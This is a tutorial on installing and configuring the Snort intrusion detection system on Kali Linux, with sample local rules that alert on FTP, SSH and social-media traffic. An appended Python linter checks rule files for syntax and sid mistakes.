Snort Installation & Configuration in Kali Linux

This post walks through the full process of installing and configuring Snort, step by step :-








STEP 1 :-  First, change the network settings as shown below before setting up snort :-






 


STEP 2 :-  Now type the following command in the Kali Linux terminal to find the IP address of your Kali machine/attacker machine :-

                  ifconfig







STEP 3 :-  Now type the following command in Kali Linux terminal to install snort :-

 

                  sudo apt install snort

 





During the installation a window will pop up in which you have to enter ‘your IP address of the Kali machine.16/24’, as shown in the image below :-







STEP 4 :-  After snort has installed successfully, type the following command to go into snort's configuration directory :-

                  cd /etc/snort







STEP 5 :-  Now list the configuration files of snort by typing the following command; these are the files where we can edit/add our own rules :-

                   ls -l








STEP 6 :-  Now create a backup of the snort configuration file, in case something happens to the original, by typing the following command :-

      

                 sudo cp snort.conf snort.conf.back






 

STEP 7 :-  Now create another copy of the file, which we will use for customizing, by typing the following command :-

   

                  sudo cp snort.conf test_snort.conf







STEP 8 :-  Now type the following command to test that snort is installed correctly and loads the configuration file without any error :-

 

                 sudo snort -T -i eth0 -c /etc/snort/test_snort.conf












STEP 9 :-  Now type the following command to go into the rules directory, where we will modify the snort rules as per our need :-

                  cd /etc/snort/rules







STEP 10 :-  Now type the following command to add new rules :- 

 

                   sudo nano local.rules

 

In the editor, type the following rules, then hit Ctrl+X to close and Y to save the rules :-

alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000001; rev:1;)

alert tcp any any -> $HOME_NET 22 (msg:"SSH connection attempt"; sid:1000002; rev:1;)

alert tcp any any -> any any (content:"www.facebook.com"; msg:"whoa! Someone is visiting facebook at this time"; sid:10000003; rev:1;)

alert tcp any any -> any any (content:"www.youtube.com"; msg:"Youtube alert...."; sid:1000004; rev:1;)

alert tcp any any -> any any (content:"www.instagram.com"; msg:"Instagram alert...."; sid:1000005; rev:1;)






STEP 11 :-  Now type the following command to start snort with alerts printed to the console :-

 

                   sudo snort -A console -q -i eth0 -c /etc/snort/test_snort.conf
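
Rules typed or pasted into local.rules as in STEP 10 are easy to break with curly quotes, a reused sid, or missing parentheses, and snort will then refuse to load the file. The following is an added example, not part of the original post: a small Python linter (the function name `lint_rules` and the sample rules are constructed for illustration) that catches those mistakes before running the `snort -T` test from STEP 8.

```python
import re

# Header fields, then the parenthesised option body (Snort 2.x text rule layout).
RULE_RE = re.compile(
    r'^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s+\((.*)\)\s*$')
SMART_QUOTES = "\u201c\u201d\u2018\u2019"   # curly quotes pasted from a web page
LOCAL_SID_MIN = 1_000_000                   # lower SIDs belong to distributed rule sets

# Constructed sample rules (not from the page); \u201c / \u201d are curly quotes.
SAMPLE_RULES = (
    'alert tcp any any -> $HOME_NET 21 (msg:"ftp connection attempt"; sid:1000001; rev:1;)\n'
    '# a comment line is skipped\n'
    'alert tcp any any -> $HOME_NET 22 (msg:"SSH connection attempt"; sid:1000001; rev:1;)\n'
    'alert tcp any any -> any any (content:"www.example.com"; msg:\u201cexample\u201d; sid:1000003; rev:1;)\n'
    'alert tcp any any -> $HOME_NET 23 (msg:"telnet attempt"; sid:4242; rev:1;)\n'
    'alert tcp any any -> $HOME_NET 25 msg:"smtp attempt"; sid:1000005; rev:1;\n'
)

def lint_rules(text):
    """Return (line_number, problem) pairs for the rules in text."""
    problems, seen = [], {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if any(q in line for q in SMART_QUOTES):
            problems.append((lineno, "curly quote: options need plain ASCII quotes"))
        m = RULE_RE.match(line)
        if not m:
            problems.append((lineno, "malformed: expected header followed by (options)"))
            continue
        body = m.group(8)
        if len(re.findall(r'(?<!\\)"', body)) % 2:   # ignore escaped \" inside msg
            problems.append((lineno, "unbalanced double quote"))
        sid = re.search(r'\bsid\s*:\s*(\d+)\s*;', body)
        if not sid:
            problems.append((lineno, "missing sid"))
            continue
        n = int(sid.group(1))
        if n < LOCAL_SID_MIN:
            problems.append((lineno, f"sid {n} is below the local range"))
        if n in seen:
            problems.append((lineno, f"sid {n} duplicates line {seen[n]}"))
        seen.setdefault(n, lineno)
    return problems

if __name__ == "__main__":
    for lineno, problem in lint_rules(SAMPLE_RULES):
        print(f"line {lineno}: {problem}")
```

To check a real file, pass its contents to the function, for example `lint_rules(open("/etc/snort/rules/local.rules").read())`.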





